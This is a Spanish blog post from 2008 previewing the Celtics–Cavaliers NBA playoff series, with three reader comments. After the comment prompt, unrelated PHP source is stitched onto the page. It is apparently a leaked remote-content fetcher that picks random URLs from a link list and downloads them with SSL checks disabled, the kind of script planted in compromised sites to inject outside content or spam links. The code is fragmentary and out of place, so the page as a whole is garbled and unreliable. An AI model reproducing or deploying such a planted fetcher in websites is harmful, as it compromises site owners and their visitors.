Lebron en busca del segundo milagro consecutivo

06 de May de 2008 por TheDeerHunter

Antecedentes: 2-2 en temporada regular. Ninguna victoria fuera de casa.
Ventaja campo: Boston

Al contrario de lo que se suponía no están siendo los playoffs del este precisamente un camino de rosas. Los Celtics viene de jugarse la vida contra Atlanta a siete partidos y Lebrón y sus Cavs de partirse las caras contra unos exaltados Wizards. Los 88 y 89 partidos respectivamente que han jugado se van acumulando en las piernas de los jugadores y pueden empezar a pasar factura desde ya mismo.

Boston lleva toda la temporada dando lecciones defensivas. Ya lo dijo T-Mac el día que se rompió la racha de 22: jamás nadie le había defendido como ellos. Hace dos noches lo volvieron a hacer y dejaron a Atlanta más secos que la mojama en el partido decisivo. Pero ese es precísamente uno de los problemas con los que se va a tener que enfrentar Boston. Fue tan sólo hace dos noches. Todos sabemos que para defender bien las piernas deben de estar frescas, ¿Pueden estarlo las de Boston con toda la tralla que se están llevando? Es difícil decirlo, porque sus principales hombres ya no son exáctamente unos mozalbetes y la profundidad de banquillo es ligeramente inferior a la de los Cavs.

Por parte de Cavaliers está Lebrón. Físicamente es una máquina perfecta que no se le ve demasiado agotado y por otro lado, lleva descansando algún día más que sus rivales. Todo gira alrededor suyo pero además, el resto de responsabilidades ofensivas está algo más repartida en Cleveland. King James, Ilgauskas, Gibson, Szczerbiak y West pueden anotar contra Big Ticket, Pierce, Allen y Rondo. Da la sensación que si el físico llega a ser un factor determinante en esta eliminatoria, Cleveland llega mejor preparado que Boston. Ahora bien, los Celtics se han mostrado intratables toda la temporada. Ha llegado la primera ronda de playoffs para mostrarnos sus flaquezas, o ¿será para espabilarlos y que se hayan dado cuenta que no son invencibles? Nos da la impresión que es más lo segundo que lo primero y que mostrarán mayor concentración desde el primer partido de la serie. Para Cleveland, sin embargo, a parte de los golpes que se han llevado no sabemos si para ellos han empezado los verdaderos playoffs o no. Más bien, a excepción de Lebrón, que todo lo hace bien, el resto da la impresión de estar todavía algo dormidos o, al menos, de no haber alcanzado el nivel que se espera de ellos.

No hay que olvidar tampoco que la eliminatoria puede decidirse por el factor campo. Boston no ha perdido en casa en estos playoffs y no parece fácil tumbarles en el Boston Garden. Hace tiempo que los verdes no llegan tan lejos y el ambiente en aquel histórico lugar va a ser impresionante. Jugar allí disputándose un teórico título es algo completamente distinto a todo… pero no podemos olvidar que Lebrón ya se paseó el año pasado en el Palace de Auburn Hills que tampoco es moco de pavo.

Por plantillas el asunto se prevee bastante equilibrado. Veremos si el juego interior de Cleveland, con gente tan grande y fuerte como Big Ben (¿es realmente él o es otro?), Ilgauskas, Varejao o Joe Smith puede hacerle daño a Garnett y Perkins. El duelo entre Lebrón y Pierce será para verlo y en el resto hay una gran igualdad que podría romper Allen, que ha dado muestras de desgaste. Con todo, lo normal es que gane Boston y si llegan concentrados como creo y no les pesa todavía el cuerpo lo harán de forma fácil. No creo en milagros dos años seguidos.

Pronóstico: 4-1 para Celtics.

Comenta

3 comentarios a esta entrada

  1. Gallis dice:
    #1

    Vamos allá…

    Por supuesto que los “tropezones” contra los Hawks pueden servir para espabilar al equipo…pero también pueden ser en “otra vez no puede ser, no??” en partidos que, de repente se compliquen. Y pese a queramos ver la botella medio llena, las señales son malas. Perder un partido fuera es un accidente, perder dos es un incordio, perder tres es un signo de flaqueza, por no decir debilidad. Además, nos hemos hartado de hablar de inexperiencia cuando los Hornets están por enmedio, pero resulta que fuera del Garden, cuando todo no va a favor, Rondo, Perkins y el banquillo fallan más de lo deseable…y luego está el hecho de que su Big Three es temible, pero no están excesivamente acostumbrados a ganar en post temporada. Su principal arma, fijate, me parece Posey…eso y el hambre.

    En cambio Cleveland tiene una cosa segura, Lebron. A partir de ahí, un partido decente de Ilgauskas y de otro hombre les permite ganar absolutamente a cualquiera. Por supuesto que hombres como Wally, West o Gibson no van a ser regulares, pero con un buen partido de cada uno los Cavs ya tienen muchísimas opciones…y a un séptimo partido yo le daría la bola a Lebron, pero en los Celtics tengo serías dudas…

    En cualquier caso, igual que en la eliminatoria Lakers-Utah he dicho que ni el primer ni el segundo partido son decisivos, aquí creo que el que dé primero, dará 2 veces…

    Por apostar, digo 3-4 a favor de los Cavs.

      Citar

  2. Viva_Dirk dice:
    #2

    Debería ganar Boston, pero no me atrevo a apostar contra Lebron, jeje.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Si el milagro es que haga que levante a verlo va a apañado. Menos mal que nos queda Ira Newble.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>